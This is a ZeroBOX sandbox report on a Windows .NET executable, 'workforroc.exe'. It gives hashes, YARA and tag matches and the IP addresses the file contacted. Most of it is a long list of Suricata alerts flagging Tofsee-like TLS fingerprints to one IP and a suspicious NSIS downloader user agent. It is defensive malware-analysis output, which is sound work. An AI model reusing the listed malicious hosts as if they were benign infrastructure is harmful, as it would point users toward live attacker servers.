Summary | ZeroBOX

workforroc.exe

Tags: NPKI, HermeticWiper, NSIS, Suspicious_Script, Generic Malware, Malicious Library, Admin Tool (Sysinternals etc ...), Antivirus, UPX, Malicious Packer, Javascript_Blob, Anti_VM, PNG Format, MZP Format, OS Processor Check, JPEG Format, PE32, PE File, .NET EXE, ZIP Format
Category FILE
Machine s1_win7_x6401
Started Jan. 30, 2024, 7:51 a.m.
Completed Jan. 30, 2024, 7:55 a.m.
Size 7.3MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 6af4b8b8c8399fca6798e3f2d7df9af5
SHA256 84d011e18cec6190e2c79b270e9d2d575bfaa63998f50d13d3f9da147f49b799
CRC32 3588BB68
ssdeep 196608:pv8GpkVa20mO8hnsSSU/sYE7m/TV38zQF5srpXh+LyDU:zythO+1SNMGcF5svH
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)

IP Address Status Action
114.108.166.90 Active Moloch
154.92.15.189 Active Moloch
164.124.101.2 Active Moloch
185.172.128.109 Active Moloch
185.172.128.90 Active Moloch
5.42.64.33 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49179 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49188 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49182 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49196 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49240 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49440 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49178 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49208 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49788 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49185 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49235 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49914 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49186 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49292 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50018 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49187 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49482 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50048 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49189 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50144 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50159 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50151 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49192 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50165 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50153 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49198 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50168 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 185.172.128.90:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.101:50167 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49184 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50170 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49174 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50171 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50174 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50175 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49173 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50172 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50179 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50183 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50196 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50188 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50202 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50203 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50207 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49190 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50209 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50213 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49207 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49203 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50230 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49211 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50237 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49474 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49180 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49291 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50244 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49609 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49311 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50256 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49851 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49542 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50026 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50265 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49735 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49199 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50052 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49183 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49204 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50145 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49209 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50148 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50155 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50275 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50156 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50276 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50158 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50277 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50211 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50281 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50212 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50295 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50220 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50296 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50224 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50300 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49194 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50228 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49250 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50235 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49252 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50239 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49280 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50241 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49671 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50246 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49974 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50247 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50106 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50251 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50252 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50257 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50161 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50304 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50259 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50313 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50262 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50267 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50323 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50269 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50027 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50339 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50152 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50291 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50340 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50157 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50297 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50341 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50160 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50162 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50307 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50169 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50163 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50309 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50187 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50318 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50198 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50319 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50201 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50177 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50328 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50206 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50184 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49206 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50334 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50208 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50189 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50337 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50173 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50190 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50343 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50176 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50192 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50178 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50349 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50348 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50180 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50354 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50191 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50357 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50363 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50195 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50365 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50197 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50367 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50210 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50370 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50215 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50193 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50216 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50194 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50384 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50223 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50387 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50226 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50390 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50199 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50233 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50248 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50205 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50249 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50218 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50250 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50232 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50253 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50254 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50258 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50260 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50264 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50236 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50272 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50242 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50279 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50245 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49290 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50286 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50255 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50287 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50266 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50290 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50270 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
